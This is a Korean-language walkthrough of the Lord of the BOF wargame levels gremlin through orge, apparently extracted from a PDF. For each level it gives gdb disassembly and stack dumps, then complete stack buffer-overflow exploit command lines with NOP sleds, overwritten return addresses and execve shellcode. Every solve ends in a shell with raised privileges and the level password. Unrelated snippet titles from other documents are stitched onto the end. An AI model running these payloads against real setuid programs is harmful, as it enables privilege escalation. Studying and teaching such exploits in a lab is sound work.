26 EGG = 0xbffffe45 gdb를이용해서분석을해보겠다. lob는 gdb를이용해서분석을못하므로 tmp디렉토리를만들어그곳에서분석을하겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,0x100 0x <main+9>: cmp DWORD PTR [%ebp+8],1 0x804843d <main+13>: jg 0x <main+38> 0x804843f <main+15>: push 0x80484e0 0x <main+20>: call 0x <printf> 0x <main+25>: add %esp,4 0x804844c <main+28>: push 0 0x804844e <main+30>: call 0x <exit> 0x <main+35>: add %esp,4 0x <main+38>: mov %eax,dword PTR [%ebp+12] 0x <main+41>: add %eax,4 0x804845c <main+44>: mov %edx,dword PTR [%eax] 0x804845e <main+46>: push %edx 0x804845f <main+47>: lea %eax,[%ebp-256] 0x <main+53>: push %eax 0x <main+54>: call 0x <strcpy> 0x804846b <main+59>: add %esp,8 0x804846e <main+62>: lea %eax,[%ebp-256] 0x <main+68>: push %eax 0x <main+69>: push 0x80484ec 0x804847a <main+74>: call 0x <printf> 0x804847f <main+79>: add %esp,8 0x <main+82>: leave 0x <main+83>: ret 0x <main+84>: nop 0x <main+85>: nop 0x <main+86>: nop 0x <main+87>: nop 0x <main+88>: nop 0x <main+89>: nop

27 0x804848a <main+90>: nop 0x804848b <main+91>: nop 0x804848c <main+92>: nop 0x804848d <main+93>: nop 0x804848e <main+94>: nop ---Type <return> to continue, or q <return> to quit--- 0x804848f <main+95>: nop End of assembler dump. buffer의위치가 ebp-256이라는것을알았다. buffer와 sfp를덮고, ret부분에환경변수의주소를쓰겠다. 쓰레기값 환경변수의주소공격을해보면 [gate@localhost tmp]$./gremlin `python -c "print '\x90'*260+'\x45\xfe\xff\xbf'"` Eþÿ bash$ 쉘이따지는것을확인했다. 그럼이것을본파일로가서하면 [gate@localhost gate]$./gremlin `python -c "print '\x90'*260+'\x45\xfe\xff\xbf'"` Eþÿ bash$ my-pass euid = 501 hello bof world LOB (gremlin ->cobolt) /* The Lord of the BOF : The Fellowship of the BOF - cobolt - small buffer */ int main(int argc, char *argv[]) { char buffer[16]; if(argc < 2){ printf("argv error\n"); exit(0);

28 strcpy(buffer, argv[1]); printf("%s\n", buffer); 1번문제와동일하지만 buffer의크기가작아졌다. 하지만우리는환경변수를이용하기때문에버퍼의크기는아무지장을주지않는다. 환경변수의주소를알아보겠다. gremlin]$ /tmp/ge EGG EGG = 0xbffffedb 복사해서 gdb 로분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,16 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804843a <main+10>: jg 0x <main+35> 0x804843c <main+12>: push 0x80484d0 0x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804844b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: mov %eax,dword PTR [%ebp+12] 0x <main+38>: add %eax,4 0x <main+41>: mov %edx,dword PTR [%eax] 0x804845b <main+43>: push %edx 0x804845c <main+44>: lea %eax,[%ebp-16] 0x804845f <main+47>: push %eax 0x <main+48>: call 0x <strcpy> 0x <main+53>: add %esp,8 0x <main+56>: lea %eax,[%ebp-16] 0x804846b <main+59>: push %eax 0x804846c <main+60>: push 0x80484dc 0x <main+65>: call 0x <printf> 0x <main+70>: add %esp,8 0x <main+73>: leave 0x804847a <main+74>: ret

29 0x804847b <main+75>: nop 0x804847c <main+76>: nop 0x804847d <main+77>: nop 0x804847e <main+78>: nop 0x804847f <main+79>: nop End of assembler dump. buffer 의시작이 ebp-16 이라는것을알았다. 쓰레기값 20 + 환경변수주소공격을하면 [gremlin@localhost tmp]$./cobolt `python -c "print 'A'*20+'\xdb\xfe\xff\xbf'"` AAAAAAAAAAAAAAAAAAAA ÿ bash$ 원본파일에서동일하게공격하면 [gremlin@localhost gremlin]$./cobolt `python -c "print 'A'*20+'\xdb\xfe\xff\xbf'"` AAAAAAAAAAAAAAAAAAAA ÿ bash$ my-pass euid = 502 hacking exposed LOB (cobolt -> goblin) /* */ The Lord of the BOF : The Fellowship of the BOF - goblin - small buffer + stdin int main() { char buffer[16]; gets(buffer); printf("%s\n", buffer); cobolt문제와비슷하지만이번에는입력을받는함수가 gets() 함수이다. FTZ에서연습했듯이 gets() 함수는 표준입력(stdin)으로 사용자의입력을받는함수이다. 따라서 pipe를이용한익스플로잇을해야한다.

30 이번문제도환경변수를이용하겠다. cobolt]$ /tmp/ge EGG EGG = 0xbffffedd 복사해서 gdb 로분석해보면 (gdb) disas main Dump of assembler code for function main: 0x80483f8 <main>: push %ebp 0x80483f9 <main+1>: mov %ebp,%esp 0x80483fb <main+3>: sub %esp,16 0x80483fe <main+6>: lea %eax,[%ebp-16] 0x <main+9>: push %eax 0x <main+10>: call 0x804830c <gets> 0x <main+15>: add %esp,4 0x804840a <main+18>: lea %eax,[%ebp-16] 0x804840d <main+21>: push %eax 0x804840e <main+22>: push 0x x <main+27>: call 0x804833c <printf> 0x <main+32>: add %esp,8 0x804841b <main+35>: leave 0x804841c <main+36>: ret 0x804841d <main+37>: nop 0x804841e <main+38>: nop 0x804841f <main+39>: nop End of assembler dump. buffer 가 ebp-16 에위치한다는것을알았다. 쓰레기값 20 + 환경변수의주소공격을해보면 [cobolt@localhost tmp]$ (python -c "print 'A'*20+'\xdd\xfe\xff\xbf'";cat)./goblin AAAAAAAAAAAAAAAAAAAAÿ id uid=502(cobolt) gid=502(cobolt) groups=502(cobolt) 원본파일을공격하면 [cobolt@localhost cobolt]$ (python -c "print 'A'*20+'\xdd\xfe\xff\xbf'";cat)./goblin

31 AAAAAAAAAAAAAAAAAAAAÿ my-pass euid = 503 hackers proof LOB (goblin -> orc) /* */ The Lord of the BOF : The Fellowship of the BOF - orc - egghunter #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer);

32 egghunter 부분에서환경변수를 memset() 함수로 0 으로초기화시킨다. 우리 에게는쉘코드를넣을수있는공간이환경변수말고도여러가지있다. 그 중하나인 argv[2] 부분에넣어보겠다. 복사를한후 gdb 로분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,44 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804850a <main+10>: jg 0x <main+35> 0x804850c <main+12>: push 0x x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804851b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: nop 0x <main+36>: mov DWORD PTR [%ebp-44],0x0 0x804852b <main+43>: nop 0x804852c <main+44>: lea %esi,[%esi*1] 0x <main+48>: mov %eax,dword PTR [%ebp-44] 0x <main+51>: lea %edx,[%eax*4] 0x804853a <main+58>: mov %eax,%ds:0x x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0 0x <main+67>: jne 0x <main+71> 0x <main+69>: jmp 0x <main+135> 0x <main+71>: mov %eax,dword PTR [%ebp-44] 0x804854a <main+74>: lea %edx,[%eax*4] 0x <main+81>: mov %eax,%ds:0x x <main+86>: mov %edx,dword PTR [%eax+%edx] 0x <main+89>: push %edx 0x804855a <main+90>: call 0x80483f0 <strlen> 0x804855f <main+95>: add %esp,4 0x <main+98>: mov %eax,%eax 0x <main+100>: push %eax 0x <main+101>: push 0 0x <main+103>: mov %eax,dword PTR [%ebp-44]

33 0x804856a <main+106>: lea %edx,[%eax*4] 0x <main+113>: mov %eax,%ds:0x x <main+118>: mov %edx,dword PTR [%eax+%edx] 0x <main+121>: push %edx 0x804857a <main+122>: call 0x <memset> ---Type <return> to continue, or q <return> to quit--- 0x804857f <main+127>: add %esp,12 0x <main+130>: inc DWORD PTR [%ebp-44] 0x <main+133>: jmp 0x <main+48> 0x <main+135>: mov %eax,dword PTR [%ebp+12] 0x804858a <main+138>: add %eax,4 0x804858d <main+141>: mov %edx,dword PTR [%eax] 0x804858f <main+143>: add %edx,47 0x <main+146>: cmp BYTE PTR [%edx],0xbf 0x <main+149>: je 0x80485b0 <main+176> 0x <main+151>: push 0x804863c 0x804859c <main+156>: call 0x <printf> 0x80485a1 <main+161>: add %esp,4 0x80485a4 <main+164>: push 0 0x80485a6 <main+166>: call 0x <exit> 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx 0x80485b9 <main+185>: lea %eax,[%ebp-40] 0x80485bc <main+188>: push %eax 0x80485bd <main+189>: call 0x <strcpy> 0x80485c2 <main+194>: add %esp,8 0x80485c5 <main+197>: lea %eax,[%ebp-40] 0x80485c8 <main+200>: push %eax 0x80485c9 <main+201>: push 0x x80485ce <main+206>: call 0x <printf> 0x80485d3 <main+211>: add %esp,8 0x80485d6 <main+214>: leave 0x80485d7 <main+215>: ret 0x80485d8 <main+216>: nop 0x80485d9 <main+217>: nop 0x80485da <main+218>: nop

34 0x80485db <main+219>: nop 0x80485dc <main+220>: nop 0x80485dd <main+221>: nop 0x80485de <main+222>: nop ---Type <return> to continue, or q <return> to quit--- 0x80485df <main+223>: nop End of assembler dump. main+185 부분을통해 buffer가 ebp-40이라는것을알았다. 그럼 argv[2] 를 nop로덮고그뒤에쉘코드를넣은후 ret을 nop의한지점으로설정해주겠다. (gdb) b * main+194 Breakpoint 1 at 0x80485c2 (gdb) r `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Starting program: /home/goblin/tmp/orc `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Breakpoint 1, 0x80485c2 in main () (gdb) x/100x $esp...( 생략 )... 0xbffffbc4: 0x x x x xbffffbd4: 0x x x x xbffffbe4: 0x682f0036 0x2f656d6f 0x6c626f67 0x742f6e69 0xbffffbf4: 0x6f2f706d 0xbf xbfbfbfbf 0xbfbfbfbf 0xbffffc04: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffc14: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffc24: 0xbfbfbfbf 0x00bfbfbf 0x x xbffffc34: 0x x x x xbffffc44: 0x x x x xbffffc54: 0x x x x xbffffc64: 0x x x x xbffffc74: 0x x x x xbffffc84: 0x x x x xbffffc94: 0x x x x xbffffca4: 0x x x x xbffffcb4: 0x x x x ( 생략 )... nop의주소를알았다. ret가 nop을가리키도록변조하면되겠다. 넉넉히 0xbffffc44로잡겠다.

35 쓰레기값 xbffffc44 + nop * shellcode 공격을하면 [goblin@localhost tmp]$./orc `python -c "print 'A'*44+'\x44\xfc\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD Segmentation fault (core dumped) 좀더정확하게 core 파일을분석하겠다. [goblin@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./orc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD'. Program terminated with signal 11, Segmentation fault. #0 0xbffffc4d in?? () (gdb) x/100x $esp...( 생략 )... 0xbffffb70: 0x x x x xbffffb80: 0x x x x xbffffb90: 0x x x x2f2e0036 0xbffffba0: 0x f 0x x x xbffffbb0: 0x x x x xbffffbc0: 0x x x x xbffffbd0: 0xbffffc44 0x x x xbffffbe0: 0x x x x xbffffbf0: 0x x x x xbffffc00: 0x x x x xbffffc10: 0x x x x xbffffc20: 0x x x x xbffffc30: 0x x x50c x732f2f68 0xbffffc40: 0x622f6868 0xe3896e69 0xe x0bb0d231...( 생략 )... 음 0xbffffbf0 로 ret 를덮어야겠다. [goblin@localhost tmp]$./orc `python -c "print 'A'*44+'\xf0\xfb\xff\xbf'"`

36 `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ 굳복사를해서똑같이하면 goblin]$./orc `python -c "print 'A'*44+'\xf0\xfb\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ id uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin) bash$ my-pass euid = 504 cantata core 파일을분석하면 segmentation error가발생했을때의시점에프로그램에기록된작업메모리를즉 esp와 ebp등여러레지스터상황을볼수있다. LOB /* */ (orc -> wolfman) The Lord of the BOF : The Fellowship of the BOF - wolfman - egghunter + buffer hunter #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0);

37 // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); buffer hunter 는 printf 이후 buffer 를 0 으로 초기화시키고, egghunter 는 환경변수를 모두 0 으로 지운다. 따라서 환경변수에 쉘코드를 두는 방법은 쓸 수 없지만, 우리는 argv[2] 를 사용해서 풀 것이기 때문에 크게 상관없다. 이번에는 아예 좀 더 정확한 분석을 위해 core 파일을 일부러 생성해 풀어 보겠다. 이제부터는 디렉토리 생성 후 복사하는 과정은 생략해도 알아서 하시길 바란다. (gdb)disas main... 생략... 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx ---Type <return> to continue, or q <return> to quit--- 0x80485b9 <main+185>: lea %eax,[%ebp-40] 0x80485bc <main+188>: push %eax 0x80485bd <main+189>: call 0x <strcpy>... 생략... buffer 가 ebp-40 에 위치한다는 것을 알았다. core 파일을 생성해 보면 [orc@localhost tmp]$ ulimit -c unlimited [orc@localhost tmp]$./wolfman `python -c 'print "\xbf"*48'` `python -c "print

38 '\x90'*100"` Segmentation fault (core dumped) ulimit -c unlimited 는 core 파일이 생성되도록 해 주는 명령어이다. core 파일을 분석해 보면 [orc@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./wolfman '. Program terminated with signal 11, Segmentation fault. #0 0xbfbfbfbf in?? () (gdb) x/50x $esp 0xbffffe38: 0x000001f8 0x c 0x000001f8 0x d 0xbffffe48: 0x000001f8 0x e 0x000001f8 0x xbffffe58: 0x0fabfbff 0x f 0xbffffe86 0x xbffffe68: 0x x x x xbffffe78: 0x x x x xbffffe88: 0x2e x6c6f772f 0x6e616d66 0xbfbfbf00 0xbffffe98: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffea8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffeb8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0x909000bf 0xbffffec8: 0x x x x xbffffed8: 0x x x x xbffffee8: 0x x x x xbffffef8: 0x x xbffffec8 로 ret 를 덮겠다. 쓰레기값 xbffffec8 + nop * shellcode [orc@localhost tmp]$./wolfman `python c print A *44+ \xc8\xfe\xff\xbf ` `python c print \x90 *100+ \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x

39 53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɾÿ Segmentation fault (core dumped) 세상은호락호락하지않다. core 파일을분석해보겠다. [orc@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./wolfman AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɾÿ '. Program terminated with signal 11, Segmentation fault. #0 0xbffffed1 in?? () (gdb) x/50x $esp 0xbffffdb8: 0x x x b 0x000001f8 0xbffffdc8: 0x c 0x000001f8 0x d 0x000001f8 0xbffffdd8: 0x e 0x000001f8 0x x0fabfbff 0xbffffde8: 0x f 0xbffffe19 0x x xbffffdf8: 0x x x x xbffffe08: 0x x x x xbffffe18: 0x x2f2e0036 0x666c6f77 0x006e616d 0xbffffe28: 0x x x x xbffffe38: 0x x x x xbffffe48: 0x x x xbffffec8 0xbffffe58: 0x x x x xbffffe68: 0x x x x xbffffe78: 0x x xbffffe78 로 ret 를덮겠다. [orc@localhost tmp]$./wolfman `python -c "print 'A'*44+'\x78\xfe\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x 8 9 \ x e 1 \ x 3 1 \ x d 2 \ x b 0 \ x 0 b \ x c d \ x 8 0 ' " ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxþÿ bash$ 쉘을획득! 똑같이해보면 [orc@localhost orc]$./wolfman `python -c "print 'A'*44+'\x78\xfe\xff\xbf'"`

40 `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x 8 9 \ x e 1 \ x 3 1 \ x d 2 \ x b 0 \ x 0 b \ x c d \ x 8 0 ' " ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxþÿ bash$ id uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc) bash$ my-pass euid = 505 love eyuna LOB (wolfman -> darkelf) /* */ The Lord of the BOF : The Fellowship of the BOF - darkelf - egghunter + buffer hunter + check length of argv[1] #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0);

41 // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); 전단계에서추가된점은 argv[1] 의길이를체크한다. 하지만우리는 argv[2] 를사용하면된다. 자빠르게 gdb 로분석한후풀어보자. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,44 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804850a <main+10>: jg 0x <main+35> 0x804850c <main+12>: push 0x x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804851b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: nop 0x <main+36>: mov DWORD PTR [%ebp-44],0x0 0x804852b <main+43>: nop 0x804852c <main+44>: lea %esi,[%esi*1] 0x <main+48>: mov %eax,dword PTR [%ebp-44] 0x <main+51>: lea %edx,[%eax*4] 0x804853a <main+58>: mov %eax,%ds:0x80497a4 0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0 0x <main+67>: jne 0x <main+71>

42 0x <main+69>: jmp 0x <main+135> 0x <main+71>: mov %eax,dword PTR [%ebp-44] 0x804854a <main+74>: lea %edx,[%eax*4] 0x <main+81>: mov %eax,%ds:0x80497a4 0x <main+86>: mov %edx,dword PTR [%eax+%edx] 0x <main+89>: push %edx 0x804855a <main+90>: call 0x80483f0 <strlen> 0x804855f <main+95>: add %esp,4 0x <main+98>: mov %eax,%eax 0x <main+100>: push %eax 0x <main+101>: push 0 0x <main+103>: mov %eax,dword PTR [%ebp-44] 0x804856a <main+106>: lea %edx,[%eax*4] 0x <main+113>: mov %eax,%ds:0x80497a4 0x <main+118>: mov %edx,dword PTR [%eax+%edx] 0x <main+121>: push %edx 0x804857a <main+122>: call 0x <memset> ---Type <return> to continue, or q <return> to quit--- 0x804857f <main+127>: add %esp,12 0x <main+130>: inc DWORD PTR [%ebp-44] 0x <main+133>: jmp 0x <main+48> 0x <main+135>: mov %eax,dword PTR [%ebp+12] 0x804858a <main+138>: add %eax,4 0x804858d <main+141>: mov %edx,dword PTR [%eax] 0x804858f <main+143>: add %edx,47 0x <main+146>: cmp BYTE PTR [%edx],0xbf 0x <main+149>: je 0x80485b0 <main+176> 0x <main+151>: push 0x804867c 0x804859c <main+156>: call 0x <printf> 0x80485a1 <main+161>: add %esp,4 0x80485a4 <main+164>: push 0 0x80485a6 <main+166>: call 0x <exit> 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx 0x80485b9 <main+185>: call 0x80483f0 <strlen> 0x80485be <main+190>: add %esp,4

43 0x80485c1 <main+193>: mov %eax,%eax 0x80485c3 <main+195>: cmp %eax,48 0x80485c6 <main+198>: jbe 0x80485e0 <main+224> 0x80485c8 <main+200>: push 0x x80485cd <main+205>: call 0x <printf> 0x80485d2 <main+210>: add %esp,4 0x80485d5 <main+213>: push 0 0x80485d7 <main+215>: call 0x <exit> 0x80485dc <main+220>: add %esp,4 0x80485df <main+223>: nop 0x80485e0 <main+224>: mov %eax,dword PTR [%ebp+12] 0x80485e3 <main+227>: add %eax,4 0x80485e6 <main+230>: mov %edx,dword PTR [%eax] 0x80485e8 <main+232>: push %edx 0x80485e9 <main+233>: lea %eax,[%ebp-40] 0x80485ec <main+236>: push %eax ---Type <return> to continue, or q <return> to quit--- 0x80485ed <main+237>: call 0x <strcpy> 0x80485f2 <main+242>: add %esp,8 0x80485f5 <main+245>: lea %eax,[%ebp-40] 0x80485f8 <main+248>: push %eax 0x80485f9 <main+249>: push 0x80486b0 0x80485fe <main+254>: call 0x <printf> 0x <main+259>: add %esp,8 0x <main+262>: push 40 0x <main+264>: push 0 0x804860a <main+266>: lea %eax,[%ebp-40] 0x804860d <main+269>: push %eax 0x804860e <main+270>: call 0x <memset> 0x <main+275>: add %esp,12 0x <main+278>: leave 0x <main+279>: ret 0x <main+280>: nop 0x <main+281>: nop 0x804861a <main+282>: nop 0x804861b <main+283>: nop 0x804861c <main+284>: nop 0x804861d <main+285>: nop 0x804861e <main+286>: nop 0x804861f <main+287>: nop

44 End of assembler dump. buffer가 ebp-40에위치한다는것을알았다. 이제 strcpy() 함수다음에 breakpoint를걸고 argv[2] 에 nop를넣어주소를알아내겠다. (gdb) b * main+242 Breakpoint 1 at 0x80485f2 (gdb) r `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Starting program: /home/wolfman/tmp/darkelf `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Breakpoint 1, 0x80485f2 in main () (gdb) x/50x $esp... 생략... 0xbffffbb4: 0xbf00666c 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbc4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbd4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbe4: 0x00bfbfbf 0x x x xbffffbf4: 0x x x x xbffffc04: 0x x x x xbffffc14: 0x x x x xbffffc24: 0x x x x xbffffc34: 0x x x x xbffffc44: 0x x x x xbffffc54: 0x x x x xbffffc64: 0x x x x xbffffc74: 0x x 생략... 0xbffffc04로 ret를덮겠다. 쓰레기값 xbffffc04 + nop + shellcode 공격을해보면 [wolfman@localhost tmp]$./darkelf `python -c "print 'A'*44+'\x04\xfc\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ 오이번엔깔끔하게쉘을획득했다. 원본파일에도공격을하면 [wolfman@localhost wolfman]$./darkelf `python -c "print 'A'*44+'\x04\xfc\xff\xbf'"` `python -c "print

45 '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ id uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman) bash$ my-pass euid = 506 kernel crashed LOB (darkelf -> orge) /* */ The Lord of the BOF : The Fellowship of the BOF - orge - check argv[0] #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // here is changed! if(strlen(argv[0])!= 77){ printf("argv[0] error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i]));

46 if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); 전단계와 달라진 점이 있다면 argv[0] 의 길이를 77 로 검사한다는 것이다. 이럴 때는 심볼릭 링크 기능을 사용하면 해결할 수 있다. 심볼릭 링크를 이용해 이름을 77 만큼 맞춘 후 argv[2] 에 nop 과 shellcode 를 넣어 쉘을 획득하겠다. 일단 심볼릭 링크를 이용하는 방법을 알아야 한다. [ln -s 원본파일 링크파일] 파일을 복사해서 분석해 보겠다. [darkelf@localhost tmp]$ pwd /home/darkelf/tmp /home/darkelf/tmp 까지 17 개로 이루어져 있으니 그 뒤의 / 까지 생각해서 (77 - 18 = 59) A*59 를 하면 되겠다. [darkelf@localhost tmp]$ ln -s orge `python -c "print 'A'*59"` [darkelf@localhost tmp]$ ll total 16 lrwxrwxrwx 1 darkelf darkelf 4 May 20 22:38 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge -rwsr-sr-x 1 darkelf darkelf May 20 22:34 orge gdb 로 분석하면 [darkelf@localhost tmp]$ gdb -q


More information

제1장 Unix란 무엇인가?

제1장  Unix란 무엇인가? 1 12 장파이프 2 12.1 파이프 파이프원리 $ who sort 파이프 3 물을보내는수도파이프와비슷 한프로세스는쓰기용파일디스크립터를이용하여파이프에데이터를보내고 ( 쓰고 ) 다른프로세스는읽기용파일디스크립터를이용하여그파이프에서데이터를받는다 ( 읽는다 ). 한방향 (one way) 통신 파이프생성 파이프는두개의파일디스크립터를갖는다. 하나는쓰기용이고다른하나는읽기용이다.

More information

untitled

untitled Step Motor Device Driver Embedded System Lab. II Step Motor Step Motor Step Motor source Embedded System Lab. II 2 open loop, : : Pulse, 1 Pulse,, -, 1 +5%, step Step Motor (2),, Embedded System Lab. II

More information

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost 익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter 2.7.3 ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost Easy RM to MP3 Converter_v2.7.3을이용하여 ROP 공격에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional

More information

슬라이드 1

슬라이드 1 / 유닉스시스템개요 / 파일 / 프로세스 01 File Descriptor file file descriptor file type unix 에서의파일은단지바이트들의나열임 operating system 은파일에어떤포맷도부과하지않음 파일의내용은바이트단위로주소를줄수있음 file descriptor 는 0 이나양수임 file 은 open 이나 creat 로 file

More information

UDCSC Hacking Festival 2005

